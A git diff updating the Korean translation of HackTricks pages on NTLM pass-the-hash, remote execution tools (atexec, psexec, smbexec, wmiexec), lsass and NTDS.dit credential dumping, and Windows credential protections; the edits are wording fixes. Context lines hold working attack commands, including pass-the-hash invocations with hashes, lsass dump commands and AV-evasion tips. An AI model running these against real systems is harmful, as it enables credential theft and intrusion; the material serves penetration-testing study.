+**첫 번째 응답**은 **클라이언트와 도메인**으로 구성된 **문자열**을 **HMAC_MD5**로 암호화하여 생성되며, **키**로는 **NT 해시**의 **MD4 해시**를 사용합니다. 그런 다음, **결과**는 **챌린지**를 암호화하기 위해 **HMAC_MD5**를 사용할 **키**로 사용됩니다. 여기에 **8 바이트의 클라이언트 챌린지**가 추가됩니다. 총: 24 B.
 
 **두 번째 응답**은 **여러 값**(새 클라이언트 챌린지, **재전송 공격**을 방지하기 위한 **타임스탬프** 등)을 사용하여 생성됩니다...
 
@@ -165,10 +165,10 @@ NTHASH=b4b9b02e6f09a9bd760f388b6700586c
 
 ## Pass-the-Hash
 
-**피해자의 해시를 얻으면**, 이를 사용하여 **가장할 수 있습니다**.\
-**해시**를 사용하여 **NTLM 인증을 수행하는** **도구**를 사용해야 하며, **또는** 새로운 **세션 로그온**을 생성하고 **LSASS** 내부에 그 **해시**를 **주입**할 수 있습니다. 그러면 **NTLM 인증이 수행될 때** 그 **해시가 사용됩니다**. 마지막 옵션이 mimikatz가 하는 것입니다.
+**희생자의 해시를 얻으면**, 이를 사용하여 **가장할 수 있습니다**.\
+**해시**를 사용하여 **NTLM 인증을 수행하는** **도구**를 사용해야 하며, **또는** 새로운 **세션 로그온**을 생성하고 **LSASS** 내부에 그 **해시**를 **주입**할 수 있습니다. 그러면 **NTLM 인증이 수행될 때** 그 **해시가 사용됩니다.** 마지막 옵션이 mimikatz가 하는 것입니다.
 
-**컴퓨터 계정을 사용하여 Pass-the-Hash 공격을 수행할 수도 있다는 점을 기억하세요.**
+**컴퓨터 계정을 사용하여 Pass-the-Hash 공격을 수행할 수 있다는 점을 기억하세요.**
 
 ### **Mimikatz**
 
@@ -189,7 +189,7 @@ Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm
 
 - **psexec_windows.exe** `C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local`
 - **wmiexec.exe** `wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local`
-- **atexec.exe** (이 경우 명령을 지정해야 하며, cmd.exe와 powershell.exe는 대화형 셸을 얻기 위해 유효하지 않습니다) `C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'`
+- **atexec.exe** (이 경우 명령을 지정해야 하며, cmd.exe와 powershell.exe는 대화형 셸을 얻기 위해 유효하지 않습니다)`C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'`
 - 더 많은 Impacket 바이너리가 있습니다...
 
 ### Invoke-TheHash
@@ -214,7 +214,7 @@ Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff
 ```
 #### Invoke-TheHash
 
-이 기능은 **모든 다른 기능의 조합**입니다. **여러 호스트**를 전달할 수 있으며, **제외**할 사람을 지정하고, 사용하고 싶은 **옵션**(_SMBExec, WMIExec, SMBClient, SMBEnum_)을 선택할 수 있습니다. **SMBExec**와 **WMIExec** 중 **어떤 것**을 선택하더라도 _**Command**_ 매개변수를 제공하지 않으면 **권한이 충분한지** **확인**만 합니다.
+이 기능은 **모든 다른 기능의 조합**입니다. **여러 호스트**를 전달할 수 있고, **제외**할 사람을 지정하며, 사용하고 싶은 **옵션**(_SMBExec, WMIExec, SMBClient, SMBEnum_)을 선택할 수 있습니다. **SMBExec**와 **WMIExec** 중 **어떤 것**을 선택하더라도 _**Command**_ 매개변수를 제공하지 않으면 **권한이 충분한지** **확인**만 합니다.
 ```
 Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty    h F6F38B793DB6A94BA04A52F1D3EE92F0
 ```
@@ -238,7 +238,7 @@ wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
 
 **Windows 호스트에서 자격 증명을 얻는 방법에 대한 자세한 정보는** [**이 페이지를 읽어야 합니다**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/ntlm/broken-reference/README.md)**.**
 
-## NTLM 릴레이 및 응답기
+## NTLM 릴레이 및 리스폰더
 
 **이 공격을 수행하는 방법에 대한 자세한 가이드는 여기에서 읽어보세요:**
 
diff --git a/src/windows-hardening/ntlm/atexec.md b/src/windows-hardening/ntlm/atexec.md
index 3b5e7eb4a..ff76d7bd3 100644
--- a/src/windows-hardening/ntlm/atexec.md
+++ b/src/windows-hardening/ntlm/atexec.md
@@ -2,9 +2,9 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## 작동 원리
+## 작동 방식
 
-At는 사용자 이름/(비밀번호/해시)를 알고 있는 호스트에서 작업을 예약할 수 있게 해줍니다. 따라서 다른 호스트에서 명령을 실행하고 출력을 얻는 데 사용할 수 있습니다.
+At는 사용자 이름/(비밀번호/해시)를 알고 있는 호스트에서 작업을 예약할 수 있게 해줍니다. 따라서 이를 사용하여 다른 호스트에서 명령을 실행하고 출력을 얻을 수 있습니다.
 ```
 At \\victim 11:00:00PM shutdown -r
 ```
diff --git a/src/windows-hardening/ntlm/psexec-and-winexec.md b/src/windows-hardening/ntlm/psexec-and-winexec.md
index 8bf878c91..2802affe2 100644
--- a/src/windows-hardening/ntlm/psexec-and-winexec.md
+++ b/src/windows-hardening/ntlm/psexec-and-winexec.md
@@ -15,11 +15,11 @@
 
 msfvenom으로 생성되고 Veil을 사용하여 안티바이러스 탐지를 피하도록 난독화된 실행 가능한 페이로드가 있다고 가정합니다. 이 페이로드는 'met8888.exe'라는 이름을 가지며, meterpreter reverse_http 페이로드를 나타냅니다. 다음 단계가 수행됩니다:
 
-- **바이너리 복사**: 실행 파일은 명령 프롬프트에서 ADMIN$ 공유로 복사되지만, 숨기기 위해 파일 시스템의 아무 곳에나 배치될 수 있습니다.
+- **바이너리 복사**: 실행 파일은 명령 프롬프트에서 ADMIN$ 공유로 복사되지만, 파일 시스템의 어디에나 배치되어 숨겨질 수 있습니다.
 
 - **서비스 생성**: Windows `sc` 명령을 사용하여 원격으로 Windows 서비스를 쿼리, 생성 및 삭제할 수 있으며, 업로드된 바이너리를 가리키는 "meterpreter"라는 이름의 서비스가 생성됩니다.
 
-- **서비스 시작**: 마지막 단계는 서비스를 시작하는 것으로, 바이너리가 진정한 서비스 바이너리가 아니기 때문에 예상 응답 코드를 반환하지 못해 "시간 초과" 오류가 발생할 가능성이 높습니다. 이 오류는 바이너리 실행이 주요 목표이므로 중요하지 않습니다.
+- **서비스 시작**: 마지막 단계는 서비스를 시작하는 것으로, 이는 바이너리가 진정한 서비스 바이너리가 아니기 때문에 예상 응답 코드를 반환하지 못해 "시간 초과" 오류가 발생할 가능성이 높습니다. 이 오류는 바이너리 실행이 주요 목표이므로 중요하지 않습니다.
 
 Metasploit 리스너를 관찰하면 세션이 성공적으로 시작되었음을 알 수 있습니다.
 
diff --git a/src/windows-hardening/ntlm/smbexec.md b/src/windows-hardening/ntlm/smbexec.md
index ecfe6bab4..5609d6ed0 100644
--- a/src/windows-hardening/ntlm/smbexec.md
+++ b/src/windows-hardening/ntlm/smbexec.md
@@ -4,7 +4,7 @@
 
 ## 작동 방식
 
-**Smbexec**는 Windows 시스템에서 원격 명령 실행을 위해 사용되는 도구로, **Psexec**와 유사하지만 대상 시스템에 악성 파일을 배치하지 않습니다.
+**Smbexec**는 Windows 시스템에서 원격 명령 실행에 사용되는 도구로, **Psexec**와 유사하지만 대상 시스템에 악성 파일을 배치하지 않습니다.
 
 ### **SMBExec**에 대한 주요 사항
 
@@ -14,22 +14,22 @@
 ```bash
 smbexec.py WORKGROUP/genericuser:genericpassword@10.10.10.10
 ```
-### 이진 파일 없이 명령 실행하기
+### 명령어 실행하기 (바이너리 없이)
 
-- **Smbexec**는 서비스 binPaths를 통해 직접 명령 실행을 가능하게 하여, 대상에 물리적 이진 파일이 필요 없게 합니다.
-- 이 방법은 Windows 대상에서 일회성 명령을 실행하는 데 유용합니다. 예를 들어, Metasploit의 `web_delivery` 모듈과 결합하면 PowerShell을 대상으로 하는 역 Meterpreter 페이로드를 실행할 수 있습니다.
-- cmd.exe를 통해 제공된 명령을 실행하도록 binPath가 설정된 원격 서비스를 공격자의 머신에서 생성함으로써, 서비스 응답 오류가 발생하더라도 페이로드를 성공적으로 실행하고 Metasploit 리스너와의 콜백 및 페이로드 실행을 달성할 수 있습니다.
+- **Smbexec**는 서비스 binPaths를 통해 직접 명령어 실행을 가능하게 하여, 대상에 물리적인 바이너리가 필요하지 않게 합니다.
+- 이 방법은 Windows 대상에서 일회성 명령어를 실행하는 데 유용합니다. 예를 들어, Metasploit의 `web_delivery` 모듈과 결합하면 PowerShell을 대상으로 하는 리버스 Meterpreter 페이로드를 실행할 수 있습니다.
+- cmd.exe를 통해 제공된 명령어를 실행하도록 binPath가 설정된 원격 서비스를 공격자의 머신에서 생성함으로써, 서비스 응답 오류가 발생하더라도 페이로드를 성공적으로 실행하고 Metasploit 리스너와의 콜백 및 페이로드 실행을 달성할 수 있습니다.
 
-### 명령 예시
+### 명령어 예시
 
-서비스를 생성하고 시작하는 것은 다음 명령으로 수행할 수 있습니다:
+서비스를 생성하고 시작하는 것은 다음 명령어로 수행할 수 있습니다:
 ```bash
 sc create [ServiceName] binPath= "cmd.exe /c [PayloadCommand]"
 sc start [ServiceName]
 ```
 자세한 내용은 [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)를 확인하세요.
 
-## 참고문헌
+## 참고 문헌
 
 - [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
 
diff --git a/src/windows-hardening/ntlm/wmiexec.md b/src/windows-hardening/ntlm/wmiexec.md
index 37f7d85e5..7c6e0a7e4 100644
--- a/src/windows-hardening/ntlm/wmiexec.md
+++ b/src/windows-hardening/ntlm/wmiexec.md
@@ -4,15 +4,15 @@
 
 ## 작동 방식 설명
 
-사용자 이름과 비밀번호 또는 해시가 알려진 호스트에서 프로세스를 열 수 있습니다. WMI를 사용하여 Wmiexec가 명령을 실행하며, 반대화면 셸 경험을 제공합니다.
+사용자 이름과 비밀번호 또는 해시가 알려진 호스트에서 프로세스를 열 수 있습니다. WMI를 사용하여 Wmiexec가 명령을 실행하며, 반대화면 상호작용 쉘 경험을 제공합니다.
 
-**dcomexec.py:** 다양한 DCOM 엔드포인트를 활용하여 이 스크립트는 wmiexec.py와 유사한 반대화면 셸을 제공하며, 특히 ShellBrowserWindow DCOM 객체를 활용합니다. 현재 MMC20, Application, Shell Windows 및 Shell Browser Window 객체를 지원합니다. (출처: [Hacking Articles](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/))
+**dcomexec.py:** 다양한 DCOM 엔드포인트를 활용하여 이 스크립트는 wmiexec.py와 유사한 반대화면 상호작용 쉘을 제공하며, 특히 ShellBrowserWindow DCOM 객체를 활용합니다. 현재 MMC20, Application, Shell Windows 및 Shell Browser Window 객체를 지원합니다. (출처: [Hacking Articles](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/))
 
 ## WMI 기초
 
 ### 네임스페이스
 
-디렉토리 스타일의 계층 구조로 구성된 WMI의 최상위 컨테이너는 \root이며, 그 아래에 네임스페이스라고 하는 추가 디렉토리가 조직되어 있습니다.
+디렉토리 스타일 계층 구조로 구성된 WMI의 최상위 컨테이너는 \root이며, 그 아래에 네임스페이스라고 하는 추가 디렉토리가 조직되어 있습니다.
 네임스페이스를 나열하는 명령:
 ```bash
 # Retrieval of Root namespaces
@@ -31,7 +31,7 @@ gwmi -Namespace "root/microsoft" -List -Recurse
 ```
 ### **클래스**
 
-WMI 클래스 이름, 예를 들어 win32_process, 및 해당 네임스페이스를 아는 것은 모든 WMI 작업에 중요합니다.  
+WMI 클래스 이름, 예를 들어 win32_process, 및 그것이 위치한 네임스페이스를 아는 것은 모든 WMI 작업에 중요합니다.
 `win32`로 시작하는 클래스를 나열하는 명령:
 ```bash
 Get-WmiObject -Recurse -List -class win32* | more # Defaults to "root\cimv2"
@@ -45,7 +45,7 @@ Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpCompute
 ```
 ### 방법
 
-WMI 클래스의 하나 이상의 실행 가능한 함수인 방법은 실행될 수 있습니다.
+WMI 클래스의 하나 이상의 실행 가능한 함수인 방법은 실행할 수 있습니다.
 ```bash
 # Class loading, method listing, and execution
 $c = [wmiclass]"win32_share"
@@ -85,13 +85,13 @@ wmic useraccount list /format:list
 wmic group list /format:list
 wmic sysaccount list /format:list
 ```
-원격에서 특정 정보를 위한 WMI 쿼리는, 예를 들어 로컬 관리자나 로그인한 사용자와 같은 정보를 신중하게 명령을 구성함으로써 가능하다.
+원격에서 특정 정보를 위한 WMI 쿼리는, 예를 들어 로컬 관리자나 로그인한 사용자와 같은 정보를 신중한 명령 구성으로 수행할 수 있습니다.
 
 ### **수동 원격 WMI 쿼리**
 
-원격 머신에서 로컬 관리자를 은밀하게 식별하고 로그인한 사용자를 확인하는 것은 특정 WMI 쿼리를 통해 달성할 수 있다. `wmic`는 또한 여러 노드에서 동시에 명령을 실행하기 위해 텍스트 파일에서 읽는 것을 지원한다.
+원격 머신에서 로컬 관리자와 로그인한 사용자를 은밀하게 식별하는 것은 특정 WMI 쿼리를 통해 달성할 수 있습니다. `wmic`는 또한 여러 노드에서 동시에 명령을 실행하기 위해 텍스트 파일에서 읽는 것을 지원합니다.
 
-WMI를 통해 프로세스를 원격으로 실행하기 위해, 예를 들어 Empire 에이전트를 배포하는 경우, 다음과 같은 명령 구조가 사용되며, 성공적인 실행은 "0"의 반환 값으로 표시된다:
+WMI를 통해 프로세스를 원격으로 실행하기 위해, 예를 들어 Empire 에이전트를 배포하는 경우, 다음과 같은 명령 구조가 사용되며, 성공적인 실행은 "0"의 반환 값으로 표시됩니다:
 ```bash
 wmic /node:hostname /user:user path win32_process call create "empire launcher string here"
 ```
diff --git a/src/windows-hardening/stealing-credentials/README.md b/src/windows-hardening/stealing-credentials/README.md
index df6474bf9..5de880781 100644
--- a/src/windows-hardening/stealing-credentials/README.md
+++ b/src/windows-hardening/stealing-credentials/README.md
@@ -28,7 +28,7 @@ Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpa
 
 ## Meterpreter를 이용한 자격 증명
 
-내가 만든 [**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials)을 사용하여 **희생자 내부에서 비밀번호와 해시를 검색하세요.**
+내가 만든 [**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials)을 사용하여 **희생자 내부에서 비밀번호와 해시를 검색**하세요.
 ```bash
 #Credentials from SAM
 post/windows/gather/smart_hashdump
@@ -49,8 +49,8 @@ mimikatz_command -f "lsadump::sam"
 
 ### Procdump + Mimikatz
 
-**Procdump는** [**SysInternals**](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**의 정품 Microsoft 도구**이므로 Defender에 의해 탐지되지 않습니다.\
-이 도구를 사용하여 **lsass 프로세스를 덤프하고**, **덤프를 다운로드**하며 **덤프에서 자격 증명을 로컬로 추출**할 수 있습니다.
+**SysInternals의 Procdump는** [**합법적인 Microsoft 도구**](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) **이기 때문에 Defender에 의해 탐지되지 않습니다.**\
+이 도구를 사용하여 **lsass 프로세스를 덤프하고**, **덤프를 다운로드하며**, **덤프에서 자격 증명을 로컬로 추출**할 수 있습니다.
 ```bash:Dump lsass
 #Local
 C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
@@ -67,7 +67,7 @@ mimikatz # sekurlsa::logonPasswords
 ```
 이 프로세스는 [SprayKatz](https://github.com/aas-n/spraykatz)를 사용하여 자동으로 수행됩니다: `./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24`
 
-**참고**: 일부 **AV**는 **procdump.exe를 사용하여 lsass.exe를 덤프하는 것**을 **악성**으로 **탐지**할 수 있습니다. 이는 **"procdump.exe"와 "lsass.exe"** 문자열을 **탐지**하기 때문입니다. 따라서 **lsass.exe의 이름 대신** procdump에 **lsass.exe의 PID를 인수로 전달하는 것이 더 은밀합니다.**
+**참고**: 일부 **AV**는 **procdump.exe를 사용하여 lsass.exe를 덤프하는 것**을 **악성**으로 **탐지**할 수 있습니다. 이는 **"procdump.exe"와 "lsass.exe"** 문자열을 **탐지**하기 때문입니다. 따라서 **lsass.exe의 PID**를 procdump에 **인수로 전달하는 것이** **lsass.exe 이름**을 사용하는 것보다 **은밀합니다.**
 
 ### **comsvcs.dll**로 lsass 덤프하기
 
@@ -80,14 +80,14 @@ mimikatz # sekurlsa::logonPasswords
 ```bash
 rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full
 ```
-**이 프로세스는** [**lssasy**](https://github.com/Hackndo/lsassy)**로 자동화할 수 있습니다.**
+**이 프로세스를** [**lssasy**](https://github.com/Hackndo/lsassy)**로 자동화할 수 있습니다.**
 
 ### **작업 관리자를 사용하여 lsass 덤프하기**
 
 1. 작업 표시줄을 마우스 오른쪽 버튼으로 클릭하고 작업 관리자를 클릭합니다.
 2. 자세히 더 보기 클릭
-3. 프로세스 탭에서 "로컬 보안 권한 부여 프로세스" 프로세스를 검색합니다.
-4. "로컬 보안 권한 부여 프로세스" 프로세스를 마우스 오른쪽 버튼으로 클릭하고 "덤프 파일 만들기"를 클릭합니다.
+3. 프로세스 탭에서 "로컬 보안 권한 프로세스" 프로세스를 검색합니다.
+4. "로컬 보안 권한 프로세스" 프로세스를 마우스 오른쪽 버튼으로 클릭하고 "덤프 파일 만들기"를 클릭합니다.
 
 ### procdump를 사용하여 lsass 덤프하기
 
@@ -184,7 +184,7 @@ Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c
 ```
 ## **Active Directory 자격 증명 - NTDS.dit**
 
-**NTDS.dit** 파일은 **Active Directory**의 핵심으로, 사용자 객체, 그룹 및 그들의 멤버십에 대한 중요한 데이터를 보유하고 있습니다. 이곳은 도메인 사용자의 **비밀번호 해시**가 저장되는 곳입니다. 이 파일은 **Extensible Storage Engine (ESE)** 데이터베이스이며 **_%SystemRoom%/NTDS/ntds.dit_**에 위치합니다.
+**NTDS.dit** 파일은 **Active Directory**의 핵심으로, 사용자 객체, 그룹 및 그들의 멤버십에 대한 중요한 데이터를 보유하고 있습니다. 이곳은 도메인 사용자에 대한 **비밀번호 해시**가 저장되는 곳입니다. 이 파일은 **Extensible Storage Engine (ESE)** 데이터베이스이며 **_%SystemRoom%/NTDS/ntds.dit_**에 위치합니다.
 
 이 데이터베이스 내에는 세 가지 주요 테이블이 유지됩니다:
 
@@ -216,7 +216,7 @@ ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
 
 ### **NTDS.dit에서 해시 추출하기**
 
-**NTDS.dit** 및 **SYSTEM** 파일을 **획득**한 후, _secretsdump.py_와 같은 도구를 사용하여 **해시를 추출**할 수 있습니다:
+**NTDS.dit**와 **SYSTEM** 파일을 **획득**한 후, _secretsdump.py_와 같은 도구를 사용하여 **해시를 추출**할 수 있습니다:
 ```bash
 secretsdump.py LOCAL -ntds ntds.dit -system SYSTEM -outputfile credentials.txt
 ```
diff --git a/src/windows-hardening/stealing-credentials/credentials-mimikatz.md b/src/windows-hardening/stealing-credentials/credentials-mimikatz.md
index e3ba3cf32..52d04d6a9 100644
--- a/src/windows-hardening/stealing-credentials/credentials-mimikatz.md
+++ b/src/windows-hardening/stealing-credentials/credentials-mimikatz.md
@@ -4,11 +4,11 @@
 
 **이 페이지는 [adsecurity.org](https://adsecurity.org/?page_id=1821)의 내용을 기반으로 합니다**. 추가 정보는 원본을 확인하세요!
 
-## LM 및 메모리의 평문
+## 메모리의 LM 및 평문
 
 Windows 8.1 및 Windows Server 2012 R2 이후로, 자격 증명 도난을 방지하기 위한 중요한 조치가 시행되었습니다:
 
-- **LM 해시 및 평문 비밀번호**는 보안을 강화하기 위해 더 이상 메모리에 저장되지 않습니다. 특정 레지스트리 설정인 _HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential"_을 DWORD 값 `0`으로 설정하여 Digest Authentication을 비활성화해야 하며, 이를 통해 "평문" 비밀번호가 LSASS에 캐시되지 않도록 합니다.
+- **LM 해시 및 평문 비밀번호**는 보안을 강화하기 위해 더 이상 메모리에 저장되지 않습니다. 특정 레지스트리 설정인 _HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential"_을 DWORD 값 `0`으로 구성하여 Digest Authentication을 비활성화해야 하며, 이를 통해 "평문" 비밀번호가 LSASS에 캐시되지 않도록 합니다.
 
 - **LSA 보호**는 로컬 보안 권한(LSA) 프로세스를 무단 메모리 읽기 및 코드 주입으로부터 보호하기 위해 도입되었습니다. 이는 LSASS를 보호된 프로세스로 표시함으로써 이루어집니다. LSA 보호를 활성화하려면:
 1. _HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa_에서 레지스트리를 수정하여 `RunAsPPL`을 `dword:00000001`로 설정합니다.
@@ -111,7 +111,7 @@ mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123
 - 다른 세션에서 Kerberos 티켓을 사용할 수 있게 합니다.
 - 예: `mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit`
 
-- **티켓 삭제**:
+- **티켓 정리**:
 - 명령어: `kerberos::purge`
 - 세션의 모든 Kerberos 티켓을 지웁니다.
 - 충돌을 피하기 위해 티켓 조작 명령어를 사용하기 전에 유용합니다.
@@ -133,7 +133,7 @@ mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123
 
 - **LSADUMP::NetSync**: 컴퓨터 계정의 비밀번호 데이터를 사용하여 DC를 가장합니다.
 
-- _원본 맥락에서 NetSync에 대한 특정 명령어가 제공되지 않았습니다._
+- _원본 맥락에서 NetSync에 대한 특정 명령어가 제공되지 않음._
 
 - **LSADUMP::SAM**: 로컬 SAM 데이터베이스에 접근합니다.
 
@@ -178,7 +178,7 @@ mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123
 - **SID::add/modify**: SID 및 SIDHistory를 변경합니다.
 
 - 추가: `mimikatz "sid::add /user:targetUser /sid:newSid" exit`
-- 수정: _원본 맥락에서 수정에 대한 특정 명령어가 제공되지 않았습니다._
+- 수정: _원본 맥락에서 수정에 대한 특정 명령어가 제공되지 않음._
 
 - **TOKEN::Elevate**: 토큰을 가장합니다.
 - `mimikatz "token::elevate /domainadmin" exit`
@@ -190,7 +190,7 @@ mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123
 - `mimikatz "ts::multirdp" exit`
 
 - **TS::Sessions**: TS/RDP 세션을 나열합니다.
-- _원본 맥락에서 TS::Sessions에 대한 특정 명령어가 제공되지 않았습니다._
+- _원본 맥락에서 TS::Sessions에 대한 특정 명령어가 제공되지 않음._
 
 ### 금고
 
diff --git a/src/windows-hardening/stealing-credentials/credentials-protections.md b/src/windows-hardening/stealing-credentials/credentials-protections.md
index 273c2691c..87c5dea49 100644
--- a/src/windows-hardening/stealing-credentials/credentials-protections.md
+++ b/src/windows-hardening/stealing-credentials/credentials-protections.md
@@ -6,7 +6,7 @@
 
 ## WDigest
 
-[WDigest](<https://technet.microsoft.com/pt-pt/library/cc778868(v=ws.10).aspx?f=255&MSPPError=-2147217396>) 프로토콜은 Windows XP와 함께 도입되었으며, HTTP 프로토콜을 통한 인증을 위해 설계되었으며 **Windows XP에서 Windows 8.0 및 Windows Server 2003에서 Windows Server 2012까지 기본적으로 활성화되어 있습니다**. 이 기본 설정은 **LSASS(로컬 보안 권한 하위 시스템 서비스)에서 평문 비밀번호 저장**을 초래합니다. 공격자는 Mimikatz를 사용하여 **이 자격 증명을 추출**할 수 있습니다:
+[WDigest](<https://technet.microsoft.com/pt-pt/library/cc778868(v=ws.10).aspx?f=255&MSPPError=-2147217396>) 프로토콜은 Windows XP와 함께 도입되었으며, HTTP 프로토콜을 통한 인증을 위해 설계되었습니다. **Windows XP에서 Windows 8.0 및 Windows Server 2003에서 Windows Server 2012까지 기본적으로 활성화되어 있습니다**. 이 기본 설정은 **LSASS(로컬 보안 권한 부여 하위 시스템 서비스)에서 평문 비밀번호 저장**을 초래합니다. 공격자는 Mimikatz를 사용하여 **이 자격 증명을 추출**할 수 있습니다:
 ```bash
 sekurlsa::wdigest
 ```
@@ -16,7 +16,7 @@ reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v Use
 ```
 ## LSA 보호
 
-**Windows 8.1**부터 Microsoft는 LSA의 보안을 강화하여 **신뢰할 수 없는 프로세스에 의한 무단 메모리 읽기 또는 코드 주입을 차단**합니다. 이 강화는 `mimikatz.exe sekurlsa:logonpasswords`와 같은 명령의 일반적인 기능을 방해합니다. 이 _**강화된 보호**_를 **활성화**하려면, _**HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA**_의 _**RunAsPPL**_ 값을 1로 조정해야 합니다:
+**Windows 8.1**부터 Microsoft는 LSA의 보안을 강화하여 **신뢰할 수 없는 프로세스에 의한 무단 메모리 읽기 또는 코드 주입을 차단**합니다. 이 강화는 `mimikatz.exe sekurlsa:logonpasswords`와 같은 명령의 일반적인 기능을 방해합니다. 이 _**강화된 보호**_를 **활성화**하려면 _**HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA**_의 _**RunAsPPL**_ 값을 1로 조정해야 합니다:
 ```
 reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL
 ```
@@ -28,27 +28,27 @@ reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL
 
 ## Credential Guard
 
-**Credential Guard**는 **Windows 10 (Enterprise 및 Education 에디션)** 전용 기능으로, **Virtual Secure Mode (VSM)** 및 **Virtualization Based Security (VBS)**를 사용하여 머신 자격 증명의 보안을 강화합니다. 이는 CPU 가상화 확장을 활용하여 주요 프로세스를 보호된 메모리 공간 내에서 격리시켜, 주요 운영 체제의 접근을 차단합니다. 이 격리는 커널조차도 VSM의 메모리에 접근할 수 없도록 하여, **pass-the-hash**와 같은 공격으로부터 자격 증명을 효과적으로 보호합니다. **Local Security Authority (LSA)**는 이 안전한 환경 내에서 신뢰할 수 있는 요소로 작동하며, 주요 OS의 **LSASS** 프로세스는 VSM의 LSA와 단순히 통신하는 역할만 합니다.
+**Credential Guard**는 **Windows 10 (Enterprise 및 Education 에디션)** 전용 기능으로, **Virtual Secure Mode (VSM)** 및 **Virtualization Based Security (VBS)**를 사용하여 머신 자격 증명의 보안을 강화합니다. 이 기능은 CPU 가상화 확장을 활용하여 주요 프로세스를 보호된 메모리 공간 내에서 격리시켜, 주요 운영 체제의 접근을 차단합니다. 이 격리는 커널조차 VSM의 메모리에 접근할 수 없도록 하여, **pass-the-hash**와 같은 공격으로부터 자격 증명을 효과적으로 보호합니다. **Local Security Authority (LSA)**는 이 안전한 환경 내에서 신뢰할 수 있는 요소로 작동하며, 주요 OS의 **LSASS** 프로세스는 VSM의 LSA와 단순히 통신하는 역할만 합니다.
 
-기본적으로 **Credential Guard**는 활성화되어 있지 않으며, 조직 내에서 수동으로 활성화해야 합니다. 이는 **Mimikatz**와 같은 도구에 대한 보안을 강화하는 데 중요하며, 이러한 도구는 자격 증명을 추출하는 능력이 제한됩니다. 그러나 로그인 시도 중에 자격 증명을 평문으로 캡처하기 위해 사용자 정의 **Security Support Providers (SSP)**를 추가함으로써 여전히 취약점을 악용할 수 있습니다.
+기본적으로 **Credential Guard**는 활성화되어 있지 않으며, 조직 내에서 수동으로 활성화해야 합니다. 이는 **Mimikatz**와 같은 도구에 대한 보안을 강화하는 데 중요하며, 이러한 도구는 자격 증명을 추출하는 능력이 제한됩니다. 그러나 사용자 정의 **Security Support Providers (SSP)**를 추가하여 로그인 시도 중에 자격 증명을 평문으로 캡처하는 방식으로 취약점을 여전히 악용할 수 있습니다.
 
-**Credential Guard**의 활성화 상태를 확인하려면, _**HKLM\System\CurrentControlSet\Control\LSA**_ 아래의 레지스트리 키 _**LsaCfgFlags**_를 검사할 수 있습니다. "**1**" 값은 **UEFI 잠금**이 있는 활성화를 나타내고, "**2**"는 잠금 없이, "**0**"은 활성화되지 않음을 나타냅니다. 이 레지스트리 확인은 강력한 지표이지만, Credential Guard를 활성화하기 위한 유일한 단계는 아닙니다. 이 기능을 활성화하기 위한 자세한 안내와 PowerShell 스크립트는 온라인에서 확인할 수 있습니다.
+**Credential Guard**의 활성화 상태를 확인하려면, _**HKLM\System\CurrentControlSet\Control\LSA**_ 아래의 레지스트리 키 _**LsaCfgFlags**_를 검사할 수 있습니다. 값이 "**1**"이면 **UEFI 잠금**이 활성화된 상태, "**2**"는 잠금 없이 활성화된 상태, "**0**"은 비활성화된 상태를 나타냅니다. 이 레지스트리 확인은 강력한 지표이지만, Credential Guard를 활성화하기 위한 유일한 단계는 아닙니다. 이 기능을 활성화하기 위한 자세한 안내와 PowerShell 스크립트는 온라인에서 확인할 수 있습니다.
 ```powershell
 reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags
 ```
